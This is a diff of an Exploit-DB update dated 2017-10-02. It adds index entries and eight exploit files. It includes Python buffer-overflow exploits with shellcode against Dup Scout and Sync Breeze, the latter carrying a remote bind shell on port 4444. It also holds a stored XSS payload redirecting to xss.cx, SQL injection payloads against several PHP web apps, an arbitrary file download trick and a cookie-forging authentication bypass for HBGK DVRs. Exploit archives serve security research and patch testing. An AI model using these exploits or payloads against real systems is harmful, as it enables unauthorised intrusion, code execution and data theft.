DB: 2017-10-02

8 new exploits

Dup Scout Enterprise 10.0.18 - 'Import Command' Buffer Overflow

Sync Breeze Enterprise 10.0.28 - Buffer Overflow
SmarterStats 11.3.6347 - Cross-Site Scripting
WordPress Plugin WPHRM - SQL Injection
PHP Multi Vendor Script 1.02 - 'sid' Parameter SQL Injection
Real Estate MLM plan script 1.0 - 'srch' Parameter SQL Injection
ConverTo Video Downloader & Converter 1.4.1 - Arbitrary File Download
HBGK DVR 3.0.0 build20161206  - Authentication Bypass

files.csv

@@ -9263,6 +9263,7 @@ id,file,description,date,author,platform,type,port
 42777,platforms/windows/local/42777.py,"CyberLink LabelPrint < 2.5 - Buffer Overflow (SEH Unicode)",2017-09-23,f3ci,windows,local,0
 42890,platforms/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,windows,local,0
 42918,platforms/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Buffer Overflow",2017-09-28,"Touhid M.Shaikh",windows,local,0
+42921,platforms/windows/local/42921.py,"Dup Scout Enterprise 10.0.18 - 'Import Command' Buffer Overflow",2017-09-29,"Touhid M.Shaikh",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15868,6 +15869,7 @@ id,file,description,date,author,platform,type,port
 42793,platforms/multiple/remote/42793.rb,"NodeJS Debugger - Command Injection (Metasploit)",2017-09-26,Metasploit,multiple,remote,5858
 42806,platforms/java/remote/42806.py,"Oracle WebLogic Server 10.3.6.0 - Java Deserialization",2017-09-27,SlidingWindow,java,remote,0
 42888,platforms/hardware/remote/42888.sh,"Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution",2017-09-27,"Adam Brown",hardware,remote,0
+42928,platforms/windows/remote/42928.py,"Sync Breeze Enterprise 10.0.28 - Buffer Overflow",2017-09-30,"Owais Mehtab",windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -38602,3 +38604,9 @@ id,file,description,date,author,platform,type,port
 42916,platforms/hardware/webapps/42916.py,"Roteador Wireless Intelbras WRN150 - Autentication Bypass",2017-09-28,"Elber Tavares",hardware,webapps,0
 42919,platforms/php/webapps/42919.txt,"Easy Blog PHP Script 1.3a - 'id' Parameter SQL Injection",2017-09-28,8bitsec,php,webapps,0
 42922,platforms/php/webapps/42922.py,"FileRun < 2017.09.18 - SQL Injection",2017-09-29,SPARC,php,webapps,0
+42923,platforms/aspx/webapps/42923.txt,"SmarterStats 11.3.6347 - Cross-Site Scripting",2017-09-27,sqlhacker,aspx,webapps,0
+42924,platforms/php/webapps/42924.txt,"WordPress Plugin WPHRM - SQL Injection",2017-09-29,"Ihsan Sencan",php,webapps,0
+42925,platforms/php/webapps/42925.txt,"PHP Multi Vendor Script 1.02 - 'sid' Parameter SQL Injection",2017-09-28,8bitsec,php,webapps,0
+42926,platforms/php/webapps/42926.txt,"Real Estate MLM plan script 1.0 - 'srch' Parameter SQL Injection",2017-09-28,8bitsec,php,webapps,0
+42927,platforms/php/webapps/42927.txt,"ConverTo Video Downloader & Converter 1.4.1 - Arbitrary File Download",2017-09-29,"Ihsan Sencan",php,webapps,0
+42931,platforms/hardware/webapps/42931.txt,"HBGK DVR 3.0.0 build20161206  - Authentication Bypass",2017-09-24,"RAT - ThiefKing",hardware,webapps,0

platforms/aspx/webapps/42923.txt

@@ -0,0 +1,68 @@
+----------------------------
+Title: CVE-2017-14620
+----------------------------
+TL;DR: SmarterStats Version 11.3.6347, and possibly prior versions, 
+will Render the Referer Field of HTTP Logfiles in URL /Data/Reports/ReferringURLsWithQueries
+----------------------------
+Author: David Hoyt
+Date: September 29, 2017
+----------------------------
+CVSS:3.0 Metrics
+CVSS:3.0 Vector String: AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N/E:H/RL:O/RC:C/CR:M/MAV:N/MAC:L/MPR:N/MUI:R/MS:U/MC:L/MI:N/MA:N
+CVSS:3.0 Scores: Base Score 4.3, Temporal Score: 4.1, Environmental Score: 4.1
+----------------------------
+Keywords
+----------------------------
+CVE-2017-14620, CWE-533, CWE-532, CWE-117, CWE-93, CAPEC-86, CAPEC-79, Stored Document Object Model Cross Site Scripting (Stored DOM XSS), 
+Client Side Request Forgery (CSRF), Open Redirection, HTTP Logfiles, Exploit, PoC, HTML Tags, SmarterStats 11.3
+----------------------------
+CVE-2017-14620 Requirements
+----------------------------
+	SmarterStats Version 11.3
+	HTTP Proxy (BurpSuite, Fiddler)
+	Web Browser (Chrome - Current/Stable)
+	User Interaction Required - Must Click Referer Link Report
+	Supported Windows OS
+	Microsoft .NET 4.5
+----------------------------
+CVE-2017-14620 Reproduction
+----------------------------
+Vendor Link https://www.smartertools.com/smarterstats/website-analytics
+Download Link https://www.smartertools.com/smarterstats/downloads
+
+Step 1: Test with an HTTP Logfile containing a URL-encoded String to the Referer Field with HTML Tags to be Rendered in a Browser:
+
+http://www.bing.com/search?q=<html><head><meta http-equiv=\"refresh\" content=\"5; 
+url=http://xss.cx/\"><title>Loading</title></head>\n<body><form method=\"post\" 
+action=\"http://xss.cx/\" target=\"_top\" id=\"rf\"><input type=\"hidden\" 
+name=\"ic\" value=\"0\"><input type=\"hidden\" name=\"fb\" value=\"true\"/>
+</form>\n<script>!function(e,t){var n,i;return!e.navigator&form=nnn
+
+Step 2: Verify the Injected IIS Logfile
+Step 3: Process the Logfiles, Select the Referer URL Report. 
+In an HTTP Proxy, watch the URL  http://localhost:9999/Data/Reports/ReferringURLsWithQueries 
+when Browsing http://localhost:9999/Default.aspx in Chrome (current/stable).
+
+Step 4: Verify the Result in your HTTP Proxy returned from the Server:
+
+{"c":[{"v":"http://www.bing.com/search?q=<html><head><meta http-equiv=\"refresh\" 
+content=\"5; url=http://xss.cx/\"><title>Loading</title></head>\n<body>
+<form method=\"post\" action=\"http://xss.cx/\" target=\"_top\" id=\"rf\">
+<input type=\"hidden\" name=\"ic\" value=\"0\"><input type=\"hidden\" name=\"fb\" value=\"true\"/>
+</form>\n<script>!function(e,t){var n,i;return!e.navigator&form=nnn"},{"v":"2","f":"2"}]}
+
+In your Browser, the HTTP Response will cause a GET to xss.cx after 5 seconds. Verify in HTTP Proxy.
+...
+GET / HTTP/1.1
+Host: xss.cx
+...
+
+Step 5: Watch your Browser get Redirected to XSS.Cx.
+----------------------------
+Summary: The Referer Field in IIS Logfiles, and possibly other Field Names, are Rendered by SmarterStats Version 11.3.6347.
+----------------------------
+Timeline
+----------------------------
+Reported to SmarterTools on September 19, 2017
+Obtain CVE-2017-14620 from MITRE on September 20, 2017
+Resolved September 28, 2017 with Version 11.xxxx

platforms/hardware/webapps/42931.txt

@@ -0,0 +1,26 @@
+# Exploit Title: HBGK DVR V3.0.0 build20161206  - Authentication Bypass
+# Date: 24-09-2017
+# Vendor Homepage: http://www.hbgk.net/en/
+# Exploit Author: RAT - ThiefKing
+# Contact: https://www.facebook.com/cctvsuperpassword
+# Website: http://tromcap.com
+# Category: webapps
+# Tested on: V2.3.1 build20160927, V3.0.0 build20161206
+# Shodan Dork: NVR Webserver
+
+1. Description
+- Any registered user can login when edit cookie userInfo
+
+2. Proof of Concept
+- When login successful: DVR save cookie : userInfo + webport with 
+value: base64 encode (user:pass)
+Ex: http://dvr-domain.dynns.com:85 --> When login successful (user: 
+admin, pass: admin), DVR will save cookie: userInfo85 with value 
+YWRtaW46YWRtaW4= (admin:admin <-- base64 decode)
+But Dvr not check pass with cookie. When not yet login, you add a 
+cookie: userInfoXX (xx : web port) with value base64 encode (admin: any 
+words). And go url: http://dvr-domain.dynns.com:XX/doc/page/main.asp. It 
+will Authentication Bypass
+
+3. Solution:
+Update to Firmware version V3.0.0 build20170925

platforms/php/webapps/42924.txt

@@ -0,0 +1,29 @@
+# # # # # 
+# Exploit Title: WordPress Plugin WPHRM - SQL Injection
+# Dork: N/A
+# Date: 29.09.2017
+# Vendor Homepage: http://mojoomla.com/
+# Software Link: https://codecanyon.net/item/wphrm-human-resource-management-system-for-wordpress/20555857
+# Demo: http://mobilewebs.net/mojoomla/extend/wordpress/wphrm/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-14848
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an employee users to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/?hr-dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL]
+# 
+# -23+union+select 1,2,3,4,5,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),7,8--%20-
+# 
+# http://localhost/[PATH]/?hr-dashboard=user&page=user&tab=view_employee&action=view&employee_id=[SQL]
+# 
+# Etc..
+# # # # #

platforms/php/webapps/42925.txt

@@ -0,0 +1,41 @@
+# Exploit Title: PHP Multi Vendor Script v1.02 - 'sid' Parameter SQL Injection
+# Date: 2017-09-28
+# Exploit Author: 8bitsec
+# Vendor Homepage: http://www.dexteritysolution.com/
+# Software Link: http://www.dexteritysolution.com/php-multivendor-e-commerce-script.html
+# Version: 1.02
+# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2017-09-28
+
+Product & Service Introduction:
+===============================
+In this business world everyone prefers to do online shopping in order to make their shopping easily because it consumes time.
+
+Technical Details & Description:
+================================
+
+SQL injection on [sid] parameter.
+
+Proof of Concept (PoC):
+=======================
+
+SQLi:
+
+http://localhost/[path]/single_detail.php?sid=15 AND 5068=5068
+
+Parameter: sid (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: sid=15 AND 5068=5068
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: sid=15 AND SLEEP(5)
+
+==================
+8bitsec - [https://twitter.com/_8bitsec]

platforms/php/webapps/42926.txt

@@ -0,0 +1,37 @@
+# Exploit Title: Real Estate MLM plan script v1.0 - 'srch' Parameter SQL Injection
+# Date: 2017-09-28
+# Exploit Author: 8bitsec
+# Vendor Homepage: http://www.mlmscript.in/
+# Software Link: http://www.mlmscript.in/real-estate-mlm-script.html
+# Version: 1.0
+# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2017-09-28
+
+Product & Service Introduction:
+===============================
+Real Estate MLM plan script we have used influential and having advanced secure database system here, that will help protect your user's sensitive details from outside attackers here we use newest technology to develop this Real Estate script.
+
+Technical Details & Description:
+================================
+
+SQL injection on [srch] parameter.
+
+Proof of Concept (PoC):
+=======================
+
+SQLi:
+
+http://localhost/[path]/product-list.php?srch=search AND 3233=3233 AND 'NeVc'='NeVc
+
+Parameter: srch (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: srch=search' AND 3233=3233 AND 'NeVc'='NeVc
+
+==================
+8bitsec - [https://twitter.com/_8bitsec]

platforms/php/webapps/42927.txt

@@ -0,0 +1,45 @@
+# # # # # 
+# Exploit Title: ConverTo Video Downloader & Converter 1.4.1 - Arbitrary File Download
+# Dork: N/A
+# Date: 29.09.2017
+# Vendor Homepage: https://codecanyon.net/user/lemonadeflirt
+# Software Link: https://codecanyon.net/item/converto-video-downloader-converter/13225966
+# Demo: http://vd.googglet.com/
+# Version: 1.4.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The security obligation allows an attacker to arbitrary download files..
+#
+# Vulnerable Source:
+#
+# .............
+# <?php
+# 
+# include_once('.......php');
+# // Check download token
+# if (empty($_GET['mime']) OR empty($_GET['token']))
+# {
+# 	exit('Invalid download token 8{');
+# }
+# 
+# // Set operation params
+# $mime = filter_var($_GET['mime']);
+# $ext  = str_replace(array('/', 'x-'), '', strstr($mime, '/'));
+# $url  = base64_decode(filter_var($_GET['token']));
+# $name = urldecode($_GET['title']). '.' .$ext; 
+# 
+# ?>
+# .............
+# Proof of Concept:
+#
+# http://localhost/[PATH]/download.php?mime=video/webm&title=Efe&token=[FILENAME_to_BASE64]
+# 
+# Etc...
+# # # # #

platforms/windows/local/42921.py

@@ -0,0 +1,64 @@
+#!/usr/bin/python
+
+#========================================================================================================================
+# Exploit Author: Touhid M.Shaikh
+# Exploit Title: Dup Scout Enterprise v10.0.18 "Import Command" Buffer
+Overflow
+# Date: 29-09-2017
+# Website: www.touhidshaikh.com
+# Contact: https://github.com/touhidshaikh
+# Vulnerable Software: Dup Scout Enterprise v10.0.18
+# Vendor Homepage: http://www.dupscout.com
+# Version: v10.0.18
+# Software Link:
+http://www.dupscout.com/setups/dupscoutent_setup_v10.0.18.exe
+# Tested On: Windows 7 x86
+#
+#
+# To reproduce the exploit:
+#   1. right Click, click on Import Command
+#   2. select evil.xml , Booom Calc POPED up.. ;)
+#========================================================================================================================
+
+
+import os,struct
+
+#offset to eip
+junk = "A" * (1560)
+
+#JMP ESP (QtGui4.dll)
+jmp1 = struct.pack('<L',0x651bb77a)
+
+#NOPS
+nops = "\x90"
+
+#LEA   EAX, [ESP+76]
+esp = "\x8D\x44\x24\x4c"
+
+#JMP ESP
+jmp2 = "\xFF\xE0"
+
+#Jump short 5
+nseh = "\x90\x90\xEB\x05"
+
+#POP POP RET
+seh = struct.pack('<L',0x6501DE41)
+
+#CALC.EXE pop shellcode
+shellcode =
+"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"
+
+
+# FINAL PAYLOAD
+buf = junk + jmp1 + nops * 16 + esp + jmp2 + nops * 90 + nseh + seh + nops
+* 10 + shellcode
+
+
+#FILE
+file='<?xml version="1.0" encoding="UTF-8"?>\n<classify\nname=\'' + buf +
+'\n</classify>'
+
+
+f = open('evil.xml', 'w')
+f.write(file)
+f.close()

platforms/windows/remote/42928.py

@@ -0,0 +1,69 @@
+# Exploit Title: [SyncBreeze POST username overflow]
+# Date: [30-Sep-2017]
+# Exploit Author: [Owais Mehtab]
+# Vendor Homepage: [http://www.syncbreeze.com]
+# Software Link: [http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe]
+# Version: [10.0.28]
+# Tested on: [Windows 7]
+
+#!/usr/bin/python
+import socket
+import os
+import sys
+
+crash = "A" * 1000
+# jmp = 10 09 0c 83 libspp.dll
+# bad char = 00 0A 0D 25 26 2B 3D
+
+bind shell on port 4444
+buf =  ""
+buf += "\xb8\x3b\xcc\xbe\xaa\xdb\xd2\xd9\x74\x24\xf4\x5b\x33"
+buf += "\xc9\xb1\x53\x31\x43\x12\x83\xc3\x04\x03\x78\xc2\x5c"
+buf += "\x5f\x82\x32\x22\xa0\x7a\xc3\x43\x28\x9f\xf2\x43\x4e"
+buf += "\xd4\xa5\x73\x04\xb8\x49\xff\x48\x28\xd9\x8d\x44\x5f"
+buf += "\x6a\x3b\xb3\x6e\x6b\x10\x87\xf1\xef\x6b\xd4\xd1\xce"
+buf += "\xa3\x29\x10\x16\xd9\xc0\x40\xcf\x95\x77\x74\x64\xe3"
+buf += "\x4b\xff\x36\xe5\xcb\x1c\x8e\x04\xfd\xb3\x84\x5e\xdd"
+buf += "\x32\x48\xeb\x54\x2c\x8d\xd6\x2f\xc7\x65\xac\xb1\x01"
+buf += "\xb4\x4d\x1d\x6c\x78\xbc\x5f\xa9\xbf\x5f\x2a\xc3\xc3"
+buf += "\xe2\x2d\x10\xb9\x38\xbb\x82\x19\xca\x1b\x6e\x9b\x1f"
+buf += "\xfd\xe5\x97\xd4\x89\xa1\xbb\xeb\x5e\xda\xc0\x60\x61"
+buf += "\x0c\x41\x32\x46\x88\x09\xe0\xe7\x89\xf7\x47\x17\xc9"
+buf += "\x57\x37\xbd\x82\x7a\x2c\xcc\xc9\x12\x81\xfd\xf1\xe2"
+buf += "\x8d\x76\x82\xd0\x12\x2d\x0c\x59\xda\xeb\xcb\x9e\xf1"
+buf += "\x4c\x43\x61\xfa\xac\x4a\xa6\xae\xfc\xe4\x0f\xcf\x96"
+buf += "\xf4\xb0\x1a\x02\xfc\x17\xf5\x31\x01\xe7\xa5\xf5\xa9"
+buf += "\x80\xaf\xf9\x96\xb1\xcf\xd3\xbf\x5a\x32\xdc\xae\xc6"
+buf += "\xbb\x3a\xba\xe6\xed\x95\x52\xc5\xc9\x2d\xc5\x36\x38"
+buf += "\x06\x61\x7e\x2a\x91\x8e\x7f\x78\xb5\x18\xf4\x6f\x01"
+buf += "\x39\x0b\xba\x21\x2e\x9c\x30\xa0\x1d\x3c\x44\xe9\xf5"
+buf += "\xdd\xd7\x76\x05\xab\xcb\x20\x52\xfc\x3a\x39\x36\x10"
+buf += "\x64\x93\x24\xe9\xf0\xdc\xec\x36\xc1\xe3\xed\xbb\x7d"
+buf += "\xc0\xfd\x05\x7d\x4c\xa9\xd9\x28\x1a\x07\x9c\x82\xec"
+buf += "\xf1\x76\x78\xa7\x95\x0f\xb2\x78\xe3\x0f\x9f\x0e\x0b"
+buf += "\xa1\x76\x57\x34\x0e\x1f\x5f\x4d\x72\xbf\xa0\x84\x36"
+buf += "\xcf\xea\x84\x1f\x58\xb3\x5d\x22\x05\x44\x88\x61\x30"
+buf += "\xc7\x38\x1a\xc7\xd7\x49\x1f\x83\x5f\xa2\x6d\x9c\x35"
+buf += "\xc4\xc2\x9d\x1f"
+
+
+crash = "A" * 780 + "\x83\x0c\x09\x10" + "\x90"*16 + buf
+
+fuzz="username="+crash+"&password=A"
+
+buffer="POST /login HTTP/1.1\r\n"
+buffer+="Host: 192.168.211.149\r\n"
+buffer+="User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0\r\n"
+buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+buffer+="Accept-Language: en-US,en;q=0.5\r\n"
+buffer+="Referer: http://192.168.211.149/login\r\n"
+buffer+="Connection: close\r\n"
+buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
+buffer+="Content-Length: "+str(len(fuzz))+"\r\n"
+buffer+="\r\n"
+buffer+=fuzz
+
+expl = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
+expl.connect(("192.168.211.149", 80))
+expl.send(buffer)
+expl.close()